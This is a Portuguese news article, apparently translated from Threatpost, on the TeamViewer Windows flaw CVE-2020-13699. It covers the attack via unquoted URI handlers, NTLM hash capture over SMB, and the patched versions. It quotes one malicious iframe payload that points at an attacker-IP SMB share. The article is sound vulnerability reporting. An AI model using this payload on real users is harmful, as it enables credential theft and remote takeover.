0
0
O popular software de suporte remoto TeamViewer corrigiu uma falha de alta gravidade em seu aplicativo de desktop para Windows. Se explorada, a falha pode permitir que invasores remotos não autenticados executem códigos nos sistemas dos usuários ou quebrem suas senhas do TeamViewer.
TeamViewer é um aplicativo de software proprietário usado por empresas para funcionalidades de controle remoto, compartilhamento de área de trabalho, reuniões online, conferência na web e transferência de arquivos entre computadores. A falha recentemente descoberta origina-se do aplicativo Desktop para Windows ( CVE-2020-13699 ) que não cita corretamente seus manipuladores de identificador de recurso uniforme personalizado (URI).
Os aplicativos precisam identificar os URIs dos sites que manipularão. Mas, como os aplicativos do manipulador podem receber dados de fontes não confiáveis, os valores de URI passados ao aplicativo podem conter dados maliciosos que tentam explorar o aplicativo. Nesse caso específico, os valores não são “citados” pelo aplicativo – o que significa que o TeamViewer os tratará como comandos em vez de valores de entrada.
“Um invasor pode incorporar um iframe malicioso em um site com um URL criado (<iframe src = ‘teamviewer10: –play \\ attacker-IP \ share \ fake.tvs’>) que iniciaria o cliente de desktop TeamViewer Windows e o forçaria para abrir um compartilhamento de SMB remoto ”, de acordo com um consultor de Jeffrey Hofmann, engenheiro de segurança da Praetorian, que revelou a falha.
Para iniciar o ataque, o invasor pode simplesmente persuadir uma vítima com o TeamViewer instalado em seu sistema a clicar em um URL criado em um site da Web – uma oportunidade para os invasores lançarem ataques potentes .
O URI então enganará o aplicativo para criar uma conexão com o protocolo SMB (Server Message Block) remoto controlado pelo invasor. SMB é um protocolo de rede usado por computadores baseados em Windows que permite que sistemas na mesma rede compartilhem arquivos.
Depois que o aplicativo TeamViewer da vítima inicia o compartilhamento SMB remoto, o Windows fará a conexão usando o NT LAN Manager (NTLM). O NTLM usa um protocolo criptografado para autenticar um usuário sem transferir a senha do usuário. As credenciais NTLM são baseadas em dados obtidos durante o processo de logon interativo e consistem em um nome de domínio, um nome de usuário e um hash unilateral da senha do usuário.
Nesse cenário de ataque, a solicitação NTLM pode então ser retransmitida por invasores usando uma ferramenta como o Responder, de acordo com Hofmann. O kit de ferramentas Responder captura sessões de autenticação SMB em uma rede interna e as retransmite para uma máquina de destino. Em última análise, isso concede aos invasores acesso à máquina da vítima, automaticamente. Também permite que eles capturem hashes de senha, que podem ser quebrados por meio de força bruta.
Felizmente para os usuários, embora o impacto potencial dessa vulnerabilidade seja alto, “o impacto prático é baixo”, explicou Hofmann ao Threatpost por e-mail. “Executar o ataque com sucesso é difícil e requer interação do usuário. Existem muitos pré-requisitos para explorar a vulnerabilidade com êxito. Todos os navegadores modernos, exceto o URL do Firefox, codificam espaços ao passar para manipuladores de URI, o que evita efetivamente esse ataque.
A falha classifica-se em 8,8 de 10,0 na escala CVSS, tornando-a alta gravidade. As versões do TeamViewer anteriores a 15.8.3 são vulneráveis, e o bug afeta várias versões do TeamViewer, incluindo: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvidepocnall1.
O problema foi corrigido em 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 e 15.8.3, disseram os pesquisadores.
Para corrigir a falha, “Implementamos algumas melhorias no manuseio de URI relacionadas ao CVE 2020-13699”, de acordo com o TeamViewer em um comunicado enviado ao Threatpost . “Obrigado, Jeffrey Hofmann da Praetorian, pelo seu profissionalismo e por seguir um modelo de divulgação responsável. Agradecemos por você ter nos contactado e confirmado a correção de suas descobertas na versão mais recente. ”
Em um aviso de segurança a respeito da falha , o Center for Internet Security (CIS) recomendou que os usuários do TeamViewer aplicassem os patches apropriados. Eles também recomendaram que os usuários evitem sites não confiáveis ou links fornecidos por fontes desconhecidas e “eduquem os usuários sobre ameaças representadas por links de hipertexto contidos em e-mails ou anexos, especialmente de fontes não confiáveis”.
As funcionalidades de controle remoto do TeamViewer o tornam um alvo lucrativo de ataque para malfeitores – especialmente com mais empresas se voltando para aplicativos de colaboração como o TeamViewer durante a pandemia. Em 2019, um ataque direcionado por e-mail contra funcionários da embaixada e autoridades financeiras do governo armamento global do TeamViewer para obter controle total do computador infectado. E no início de 2020, uma variante recém-descoberta do trojan Cerberus Android foi descoberta com recursos de coleta de informações amplamente expandidos e mais sofisticados e a capacidade de executar o TeamViewer.
FONTE: THREAT POST